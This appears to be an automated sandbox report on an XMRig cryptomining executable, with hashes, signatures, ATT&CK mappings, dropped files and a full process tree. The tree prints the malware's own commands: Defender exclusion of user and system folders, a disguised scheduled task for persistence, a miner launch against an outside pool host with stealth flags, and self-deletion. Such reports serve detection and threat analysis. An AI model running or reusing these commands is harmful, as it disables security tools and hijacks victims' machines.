Analysis

  • max time kernel
    137s
  • max time network
    159s
  • platform
    windows7_x64
  • resource
    win7v20210410
  • submitted
    27-07-2021 00:01

General

  • Target

    cab63b06017beec8efd11d7f03ca5a85.exe

  • Size

    99KB

  • MD5

    cab63b06017beec8efd11d7f03ca5a85

  • SHA1

    4f252e828d51bfe8cf1322e6c18656a8a9b359e2

  • SHA256

    cc6611635ca61701a1aa303698270f8e6d8de4f6fc5e6b3a11c5fa9cb1621972

  • SHA512

    9011b9bed98b8474f59e78966d5c31d36348afb256cc3d0a8406beb8038c03cb4d44b72e2fa4fb6868c8242909d71fcbfdcd359f727b9962293240c563da80e4

Score
10/10

Malware Config

Signatures

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner Payload 2 IoCs
  • Executes dropped EXE 4 IoCs
  • Loads dropped DLL 4 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Drops file in System32 directory 9 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies system certificate store 2 TTPs 6 IoCs
  • Suspicious behavior: EnumeratesProcesses 18 IoCs
  • Suspicious use of AdjustPrivilegeToken 12 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\cab63b06017beec8efd11d7f03ca5a85.exe
    "C:\Users\Admin\AppData\Local\Temp\cab63b06017beec8efd11d7f03ca5a85.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1080
    • C:\Windows\system32\cmd.exe
      "cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:840
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1976
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1944
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1052
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1572
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\svchost64.exe "C:\Users\Admin\AppData\Local\Temp\cab63b06017beec8efd11d7f03ca5a85.exe"
      2⤵
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:1548
      • C:\Users\Admin\AppData\Local\Temp\svchost64.exe
        C:\Users\Admin\AppData\Local\Temp\svchost64.exe "C:\Users\Admin\AppData\Local\Temp\cab63b06017beec8efd11d7f03ca5a85.exe"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Drops file in System32 directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:864
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "splwow64" /tr '"C:\Windows\system32\splwow64.exe"' & exit
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:1536
          • C:\Windows\system32\schtasks.exe
            schtasks /create /f /sc onlogon /rl highest /tn "splwow64" /tr '"C:\Windows\system32\splwow64.exe"'
            5⤵
            • Creates scheduled task(s)
            PID:1148
        • C:\Windows\system32\splwow64.exe
          "C:\Windows\system32\splwow64.exe"
          4⤵
          • Executes dropped EXE
          • Suspicious use of WriteProcessMemory
          PID:480
          • C:\Windows\system32\cmd.exe
            "cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:360
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
              6⤵
              • Drops file in System32 directory
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:1172
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
              6⤵
              • Drops file in System32 directory
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:1616
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
              6⤵
              • Drops file in System32 directory
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:2040
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
              6⤵
              • Drops file in System32 directory
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:1908
          • C:\Windows\System32\cmd.exe
            "C:\Windows\System32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\svchost64.exe "C:\Windows\system32\splwow64.exe"
            5⤵
            • Loads dropped DLL
            • Suspicious use of WriteProcessMemory
            PID:592
            • C:\Users\Admin\AppData\Local\Temp\svchost64.exe
              C:\Users\Admin\AppData\Local\Temp\svchost64.exe "C:\Windows\system32\splwow64.exe"
              6⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Drops file in System32 directory
              • Suspicious use of SetThreadContext
              • Modifies system certificate store
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:1836
              • C:\Windows\System32\cmd.exe
                "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "splwow64" /tr '"C:\Windows\system32\splwow64.exe"' & exit
                7⤵
                • Suspicious use of WriteProcessMemory
                PID:1248
                • C:\Windows\system32\schtasks.exe
                  schtasks /create /f /sc onlogon /rl highest /tn "splwow64" /tr '"C:\Windows\system32\splwow64.exe"'
                  8⤵
                  • Creates scheduled task(s)
                  PID:1576
              • C:\Windows\system32\Microsoft\Libs\sihost64.exe
                "C:\Windows\system32\Microsoft\Libs\sihost64.exe"
                7⤵
                • Executes dropped EXE
                PID:1104
              • C:\Windows\explorer.exe
                C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --donate-level=1 --url=cryptolegion.ddns.net --user={COMPUTERNAME}/LEGION --pass={COMPUTERNAME}/LEGION --cpu-max-threads-hint=20 --cinit-idle-wait=5 --cinit-idle-cpu=80 --nicehash --cinit-stealth
                7⤵
                • Suspicious use of AdjustPrivilegeToken
                PID:1976
              • C:\Windows\System32\cmd.exe
                "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\svchost64.exe"
                7⤵
                  PID:2028
                  • C:\Windows\system32\choice.exe
                    choice /C Y /N /D Y /T 3
                    8⤵
                      PID:560
            • C:\Windows\System32\cmd.exe
              "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\svchost64.exe"
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:936
              • C:\Windows\system32\choice.exe
                choice /C Y /N /D Y /T 3
                5⤵
                  PID:1300

        Network

        MITRE ATT&CK Matrix ATT&CK v6

        Execution

        Scheduled Task

        1
        T1053

        Persistence

        Scheduled Task

        1
        T1053

        Privilege Escalation

        Scheduled Task

        1
        T1053

        Defense Evasion

        Install Root Certificate

        1
        T1130

        Modify Registry

        1
        T1112

        Discovery

        System Information Discovery

        1
        T1082

        Command and Control

        Web Service

        1
        T1102

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_01363a72-4816-48d4-a6c4-ea4f1520f0d0
          MD5

          e5b3ba61c3cf07deda462c9b27eb4166

          SHA1

          b324dad73048be6e27467315f82b7a5c1438a1f9

          SHA256

          b84fae85b6203a0c8c9db3ba3c050c97d6700e5c9ae27dd31c103ec1bbb02925

          SHA512

          a5936a098db2e8c0d0231fd97d73cc996ad99897fd64f0e5c6761c44b8eb2db2bff477843d326503e6027c1113da0e8e35f4227195a3cf505c5a374ebe0f67fc

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_1bc86d09-585f-4091-a76f-be112dd4843d
          MD5

          2d5cd190b5db0620cd62e3cd6ba1dcd3

          SHA1

          ff4f229f4fbacccdf11d98c04ba756bda80aac7a

          SHA256

          ab9aee31b3411bcc5a5fb51e9375777cca79cfb3a532d93ddd98a5673c60571d

          SHA512

          edb2a46f3ee33b48f8fe0b548c1e7940978d0e4ac90d5090807d8b5c8b1320217e5d66990b1d0a85546acbbaf9b601590d35de87de234da8eafd60d12fdce610

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_43352165-1df8-4ad7-a533-54a03951c502
          MD5

          d89968acfbd0cd60b51df04860d99896

          SHA1

          b3c29916ccb81ce98f95bbf3aa8a73de16298b29

          SHA256

          1020cc7c929cd5a4e68ccb40353ca76f427df363f0d95e456eb79db039bdb2b9

          SHA512

          b0e886cce598371b59131fed1535e220c798691bad93ef9474ba440066f5a6bd77a60966604b7a5ff6298b2e200c9dd0c8f9f04aff208b2af423480ead4e8842

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_6a3caaa4-d938-4060-881c-db29260884dc
          MD5

          a70ee38af4bb2b5ed3eeb7cbd1a12fa3

          SHA1

          81dbaeae4b0f9e1adc0a1e3d6d76a12396498ba9

          SHA256

          dd2f41f92f19c3fe031bdf5da68ab06768e26762d0077b290cd0094df1d5d58d

          SHA512

          8c69a5300c7545c5c4b25a0594e6813b6b7a85b5f3ae7fc5464b4074fe6f50b2f49d31cacf19bc20a02bb8e237656f1b9b2a3f6a3953e3a8478ca2adc154e0e3

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_6e6971b7-28ba-4f29-9b98-9ddb71dbd5d8
          MD5

          6f0d509e28be1af95ba237d4f43adab4

          SHA1

          c665febe79e435843553bee86a6cea731ce6c5e4

          SHA256

          f545be30e70cd6e1b70e98239219735f6b61c25712720bb1e1738f02be900e7e

          SHA512

          8dbadc140fd18eb16e2a282e3a0a895299b124850e7b9454a3f24e1cc1c090c5bebfbff5062e8807369e84ed7359e0854722cfd45b9a63681f9fea8c97fab797

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_cc860e47-960e-4af3-82aa-fe17706f80ef
          MD5

          faa37917b36371249ac9fcf93317bf97

          SHA1

          a0f0d84d58ee518d33a69f5f1c343aa921c8ffd4

          SHA256

          b92f1a891dbe4152a1f834774cc83378d8b4cffb7e344a813219d74ec4084132

          SHA512

          614d3692e5be7554a72a38af408458254af271eaf6855f322ae07aaa647b1478c7ad13027285c8d9999db3739d65ac85ecfdf3e56acca8484083aa0e31de2198

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_f17f6e9e-4a25-4e3f-b1d1-3bb9ba562e1c
          MD5

          7f79b990cb5ed648f9e583fe35527aa7

          SHA1

          71b177b48c8bd745ef02c2affad79ca222da7c33

          SHA256

          080ec69d3f2abac629a0bdc314f150ad42a9a1b0a031b1d5c7b5b80051c48683

          SHA512

          20926edf7f0b990da4bd8d7ba91bd8bf7b952b75080f687afa7197a91777604688303d38b4a0a7240b558c23f2e0cd927d3590765109f8be0551f5eb050eafda

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
          MD5

          2883e82bba9abc92e662cae4d56f7d15

          SHA1

          41253bb93509bbd44c012a3d64b25bc4744dec60

          SHA256

          dcc9d4734b88574ad7deb769766e22e73a944b120da6d9ee775c4b5ce304ad4a

          SHA512

          8a8b3417f08f349ac68ed63f05cc1d55a3302eaa71a2bf7da72b52e82b0141f194b580640f8597e193f7eda6d546bb8028059aa212845a0ed1bf4f7680f33f78

        • C:\Users\Admin\AppData\Local\Temp\svchost64.exe
          MD5

          b97dba5ec3906d3b681efdf92b78a4d7

          SHA1

          b90192a2281ba8c2f91097e8abdbab4238a1bd84

          SHA256

          94d81c37666beed9fda950adfe53c554116c45be7eabfcd42b9f5b1feaefbc7f

          SHA512

          ba1d43f0f7e89769c422a879a2836405e3898b1ac18b78309bec835f31096b1643dfaa33d3cab3d7259806705971d78226752d3f3a885663b635d17cbef7e05a

        • C:\Users\Admin\AppData\Local\Temp\svchost64.exe
          MD5

          b97dba5ec3906d3b681efdf92b78a4d7

          SHA1

          b90192a2281ba8c2f91097e8abdbab4238a1bd84

          SHA256

          94d81c37666beed9fda950adfe53c554116c45be7eabfcd42b9f5b1feaefbc7f

          SHA512

          ba1d43f0f7e89769c422a879a2836405e3898b1ac18b78309bec835f31096b1643dfaa33d3cab3d7259806705971d78226752d3f3a885663b635d17cbef7e05a

        • C:\Users\Admin\AppData\Local\Temp\svchost64.exe
          MD5

          b97dba5ec3906d3b681efdf92b78a4d7

          SHA1

          b90192a2281ba8c2f91097e8abdbab4238a1bd84

          SHA256

          94d81c37666beed9fda950adfe53c554116c45be7eabfcd42b9f5b1feaefbc7f

          SHA512

          ba1d43f0f7e89769c422a879a2836405e3898b1ac18b78309bec835f31096b1643dfaa33d3cab3d7259806705971d78226752d3f3a885663b635d17cbef7e05a

        • C:\Users\Admin\AppData\Local\Temp\svchost64.exe
          MD5

          b97dba5ec3906d3b681efdf92b78a4d7

          SHA1

          b90192a2281ba8c2f91097e8abdbab4238a1bd84

          SHA256

          94d81c37666beed9fda950adfe53c554116c45be7eabfcd42b9f5b1feaefbc7f

          SHA512

          ba1d43f0f7e89769c422a879a2836405e3898b1ac18b78309bec835f31096b1643dfaa33d3cab3d7259806705971d78226752d3f3a885663b635d17cbef7e05a

        • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
          MD5

          530b662d79d9ce226a1a4cdca98d2e43

          SHA1

          447a37ce77cce9a6304268716ca65763fc0f383e

          SHA256

          bf18a3357fff551d4c96370418c7132e62ad915a1016e4994fdc6d708d08a739

          SHA512

          d6af7c2d8b16ffa44a111be7f024d97450dffc345e0bcbb3507b89b561d7488230fef84f499640da1a5260d6ec38abfcadebfcbe4942c3587bab4b3cc68bad73

        • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
          MD5

          57df22c2f179f5d259ba6e3f4c5f6ffe

          SHA1

          80d74c5f2e55c45e84328faa6be95efec87bf7f5

          SHA256

          e3ad2c29a9c3c762754afb0737c8e3da4a53a3649f337dae6333e1bd684ab910

          SHA512

          bd52f815093090964db59d0fd6810c40c01839ca3e14d21c824c971bf53499518355621b12a2fa3bd389eeefb1efb2f5b47a16c5b51ddd8dd015ebebc2232523

        • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
          MD5

          530b662d79d9ce226a1a4cdca98d2e43

          SHA1

          447a37ce77cce9a6304268716ca65763fc0f383e

          SHA256

          bf18a3357fff551d4c96370418c7132e62ad915a1016e4994fdc6d708d08a739

          SHA512

          d6af7c2d8b16ffa44a111be7f024d97450dffc345e0bcbb3507b89b561d7488230fef84f499640da1a5260d6ec38abfcadebfcbe4942c3587bab4b3cc68bad73

        • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
          MD5

          530b662d79d9ce226a1a4cdca98d2e43

          SHA1

          447a37ce77cce9a6304268716ca65763fc0f383e

          SHA256

          bf18a3357fff551d4c96370418c7132e62ad915a1016e4994fdc6d708d08a739

          SHA512

          d6af7c2d8b16ffa44a111be7f024d97450dffc345e0bcbb3507b89b561d7488230fef84f499640da1a5260d6ec38abfcadebfcbe4942c3587bab4b3cc68bad73

        • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
          MD5

          530b662d79d9ce226a1a4cdca98d2e43

          SHA1

          447a37ce77cce9a6304268716ca65763fc0f383e

          SHA256

          bf18a3357fff551d4c96370418c7132e62ad915a1016e4994fdc6d708d08a739

          SHA512

          d6af7c2d8b16ffa44a111be7f024d97450dffc345e0bcbb3507b89b561d7488230fef84f499640da1a5260d6ec38abfcadebfcbe4942c3587bab4b3cc68bad73

        • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
          MD5

          57df22c2f179f5d259ba6e3f4c5f6ffe

          SHA1

          80d74c5f2e55c45e84328faa6be95efec87bf7f5

          SHA256

          e3ad2c29a9c3c762754afb0737c8e3da4a53a3649f337dae6333e1bd684ab910

          SHA512

          bd52f815093090964db59d0fd6810c40c01839ca3e14d21c824c971bf53499518355621b12a2fa3bd389eeefb1efb2f5b47a16c5b51ddd8dd015ebebc2232523

        • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
          MD5

          57df22c2f179f5d259ba6e3f4c5f6ffe

          SHA1

          80d74c5f2e55c45e84328faa6be95efec87bf7f5

          SHA256

          e3ad2c29a9c3c762754afb0737c8e3da4a53a3649f337dae6333e1bd684ab910

          SHA512

          bd52f815093090964db59d0fd6810c40c01839ca3e14d21c824c971bf53499518355621b12a2fa3bd389eeefb1efb2f5b47a16c5b51ddd8dd015ebebc2232523

        • C:\Windows\System32\Microsoft\Libs\sihost64.exe
          MD5

          1a39ac13bc88ad7d21e874535107fe83

          SHA1

          a0c88f578af5bed2d873eba3a32b0b712b41f4ae

          SHA256

          25a04f0d47b9c7235412cf56fd1fd74b4bd4fd332abf64a3cdc656f99748ae55

          SHA512

          5d2141bf03aa17c927f7fc6a97d0a36e79af6372b10826d491af31f79b2267b57a02eda258c4ce3a50a322384cde5970ae74ae146bc550939dce90e1cf34e0c1

        • C:\Windows\System32\splwow64.exe
          MD5

          cab63b06017beec8efd11d7f03ca5a85

          SHA1

          4f252e828d51bfe8cf1322e6c18656a8a9b359e2

          SHA256

          cc6611635ca61701a1aa303698270f8e6d8de4f6fc5e6b3a11c5fa9cb1621972

          SHA512

          9011b9bed98b8474f59e78966d5c31d36348afb256cc3d0a8406beb8038c03cb4d44b72e2fa4fb6868c8242909d71fcbfdcd359f727b9962293240c563da80e4

        • C:\Windows\system32\Microsoft\Libs\sihost64.exe
          MD5

          1a39ac13bc88ad7d21e874535107fe83

          SHA1

          a0c88f578af5bed2d873eba3a32b0b712b41f4ae

          SHA256

          25a04f0d47b9c7235412cf56fd1fd74b4bd4fd332abf64a3cdc656f99748ae55

          SHA512

          5d2141bf03aa17c927f7fc6a97d0a36e79af6372b10826d491af31f79b2267b57a02eda258c4ce3a50a322384cde5970ae74ae146bc550939dce90e1cf34e0c1

        • C:\Windows\system32\splwow64.exe
          MD5

          cab63b06017beec8efd11d7f03ca5a85

          SHA1

          4f252e828d51bfe8cf1322e6c18656a8a9b359e2

          SHA256

          cc6611635ca61701a1aa303698270f8e6d8de4f6fc5e6b3a11c5fa9cb1621972

          SHA512

          9011b9bed98b8474f59e78966d5c31d36348afb256cc3d0a8406beb8038c03cb4d44b72e2fa4fb6868c8242909d71fcbfdcd359f727b9962293240c563da80e4

        • \Users\Admin\AppData\Local\Temp\svchost64.exe
          MD5

          b97dba5ec3906d3b681efdf92b78a4d7

          SHA1

          b90192a2281ba8c2f91097e8abdbab4238a1bd84

          SHA256

          94d81c37666beed9fda950adfe53c554116c45be7eabfcd42b9f5b1feaefbc7f

          SHA512

          ba1d43f0f7e89769c422a879a2836405e3898b1ac18b78309bec835f31096b1643dfaa33d3cab3d7259806705971d78226752d3f3a885663b635d17cbef7e05a

        • \Users\Admin\AppData\Local\Temp\svchost64.exe
          MD5

          b97dba5ec3906d3b681efdf92b78a4d7

          SHA1

          b90192a2281ba8c2f91097e8abdbab4238a1bd84

          SHA256

          94d81c37666beed9fda950adfe53c554116c45be7eabfcd42b9f5b1feaefbc7f

          SHA512

          ba1d43f0f7e89769c422a879a2836405e3898b1ac18b78309bec835f31096b1643dfaa33d3cab3d7259806705971d78226752d3f3a885663b635d17cbef7e05a

        • \Windows\System32\Microsoft\Libs\sihost64.exe
          MD5

          1a39ac13bc88ad7d21e874535107fe83

          SHA1

          a0c88f578af5bed2d873eba3a32b0b712b41f4ae

          SHA256

          25a04f0d47b9c7235412cf56fd1fd74b4bd4fd332abf64a3cdc656f99748ae55

          SHA512

          5d2141bf03aa17c927f7fc6a97d0a36e79af6372b10826d491af31f79b2267b57a02eda258c4ce3a50a322384cde5970ae74ae146bc550939dce90e1cf34e0c1

        • \Windows\System32\splwow64.exe
          MD5

          cab63b06017beec8efd11d7f03ca5a85

          SHA1

          4f252e828d51bfe8cf1322e6c18656a8a9b359e2

          SHA256

          cc6611635ca61701a1aa303698270f8e6d8de4f6fc5e6b3a11c5fa9cb1621972

          SHA512

          9011b9bed98b8474f59e78966d5c31d36348afb256cc3d0a8406beb8038c03cb4d44b72e2fa4fb6868c8242909d71fcbfdcd359f727b9962293240c563da80e4

        • memory/360-140-0x0000000000000000-mapping.dmp
        • memory/480-137-0x000000013F5E0000-0x000000013F5E1000-memory.dmp
          Filesize

          4KB

        • memory/480-149-0x0000000002290000-0x0000000002292000-memory.dmp
          Filesize

          8KB

        • memory/480-134-0x0000000000000000-mapping.dmp
        • memory/560-200-0x0000000000000000-mapping.dmp
        • memory/592-179-0x0000000000000000-mapping.dmp
        • memory/840-61-0x0000000000000000-mapping.dmp
        • memory/864-128-0x000000013F950000-0x000000013F951000-memory.dmp
          Filesize

          4KB

        • memory/864-130-0x000000001BAD0000-0x000000001BAD2000-memory.dmp
          Filesize

          8KB

        • memory/864-125-0x0000000000000000-mapping.dmp
        • memory/936-139-0x0000000000000000-mapping.dmp
        • memory/1052-112-0x000000001AAE0000-0x000000001AAE2000-memory.dmp
          Filesize

          8KB

        • memory/1052-113-0x000000001AAE4000-0x000000001AAE6000-memory.dmp
          Filesize

          8KB

        • memory/1052-105-0x0000000000000000-mapping.dmp
        • memory/1080-67-0x000000001BDC0000-0x000000001BDC2000-memory.dmp
          Filesize

          8KB

        • memory/1080-59-0x000000013FCB0000-0x000000013FCB1000-memory.dmp
          Filesize

          4KB

        • memory/1104-195-0x000000001BE30000-0x000000001BE32000-memory.dmp
          Filesize

          8KB

        • memory/1104-188-0x0000000000000000-mapping.dmp
        • memory/1148-132-0x0000000000000000-mapping.dmp
        • memory/1172-151-0x000000001AA14000-0x000000001AA16000-memory.dmp
          Filesize

          8KB

        • memory/1172-150-0x000000001AA10000-0x000000001AA12000-memory.dmp
          Filesize

          8KB

        • memory/1172-142-0x0000000000000000-mapping.dmp
        • memory/1248-186-0x0000000000000000-mapping.dmp
        • memory/1300-141-0x0000000000000000-mapping.dmp
        • memory/1536-131-0x0000000000000000-mapping.dmp
        • memory/1548-123-0x0000000000000000-mapping.dmp
        • memory/1572-122-0x000000001A874000-0x000000001A876000-memory.dmp
          Filesize

          8KB

        • memory/1572-121-0x000000001A870000-0x000000001A872000-memory.dmp
          Filesize

          8KB

        • memory/1572-114-0x0000000000000000-mapping.dmp
        • memory/1576-189-0x0000000000000000-mapping.dmp
        • memory/1616-152-0x0000000000000000-mapping.dmp
        • memory/1616-159-0x000000001ACA4000-0x000000001ACA6000-memory.dmp
          Filesize

          8KB

        • memory/1616-158-0x000000001ACA0000-0x000000001ACA2000-memory.dmp
          Filesize

          8KB

        • memory/1836-194-0x000000001BD00000-0x000000001BD02000-memory.dmp
          Filesize

          8KB

        • memory/1836-181-0x0000000000000000-mapping.dmp
        • memory/1836-184-0x000000013F8D0000-0x000000013F8D1000-memory.dmp
          Filesize

          4KB

        • memory/1908-170-0x0000000000000000-mapping.dmp
        • memory/1908-175-0x000000001AA80000-0x000000001AA82000-memory.dmp
          Filesize

          8KB

        • memory/1908-176-0x000000001AA84000-0x000000001AA86000-memory.dmp
          Filesize

          8KB

        • memory/1944-91-0x0000000001FA0000-0x0000000001FA1000-memory.dmp
          Filesize

          4KB

        • memory/1944-88-0x0000000000000000-mapping.dmp
        • memory/1944-94-0x0000000002350000-0x0000000002351000-memory.dmp
          Filesize

          4KB

        • memory/1944-93-0x0000000002750000-0x0000000002751000-memory.dmp
          Filesize

          4KB

        • memory/1944-92-0x000000001ACB0000-0x000000001ACB1000-memory.dmp
          Filesize

          4KB

        • memory/1944-96-0x000000001AC34000-0x000000001AC36000-memory.dmp
          Filesize

          8KB

        • memory/1944-95-0x000000001AC30000-0x000000001AC32000-memory.dmp
          Filesize

          8KB

        • memory/1976-87-0x0000000002800000-0x0000000002801000-memory.dmp
          Filesize

          4KB

        • memory/1976-62-0x0000000000000000-mapping.dmp
        • memory/1976-74-0x000000001AAD0000-0x000000001AAD1000-memory.dmp
          Filesize

          4KB

        • memory/1976-70-0x0000000002590000-0x0000000002591000-memory.dmp
          Filesize

          4KB

        • memory/1976-69-0x000000001AB34000-0x000000001AB36000-memory.dmp
          Filesize

          8KB

        • memory/1976-86-0x00000000027F0000-0x00000000027F1000-memory.dmp
          Filesize

          4KB

        • memory/1976-204-0x0000000000480000-0x00000000004A0000-memory.dmp
          Filesize

          128KB

        • memory/1976-68-0x000000001AB30000-0x000000001AB32000-memory.dmp
          Filesize

          8KB

        • memory/1976-66-0x0000000002540000-0x0000000002541000-memory.dmp
          Filesize

          4KB

        • memory/1976-203-0x0000000000350000-0x0000000000370000-memory.dmp
          Filesize

          128KB

        • memory/1976-65-0x000000001ABB0000-0x000000001ABB1000-memory.dmp
          Filesize

          4KB

        • memory/1976-64-0x0000000002370000-0x0000000002371000-memory.dmp
          Filesize

          4KB

        • memory/1976-63-0x000007FEFC221000-0x000007FEFC223000-memory.dmp
          Filesize

          8KB

        • memory/1976-202-0x0000000000350000-0x0000000000370000-memory.dmp
          Filesize

          128KB

        • memory/1976-197-0x00000001402EB66C-mapping.dmp
        • memory/1976-201-0x0000000140000000-0x0000000140758000-memory.dmp
          Filesize

          7.3MB

        • memory/1976-71-0x000000001A920000-0x000000001A921000-memory.dmp
          Filesize

          4KB

        • memory/2028-199-0x0000000000000000-mapping.dmp
        • memory/2040-161-0x0000000000000000-mapping.dmp
        • memory/2040-168-0x000000001AC34000-0x000000001AC36000-memory.dmp
          Filesize

          8KB

        • memory/2040-167-0x000000001AC30000-0x000000001AC32000-memory.dmp
          Filesize

          8KB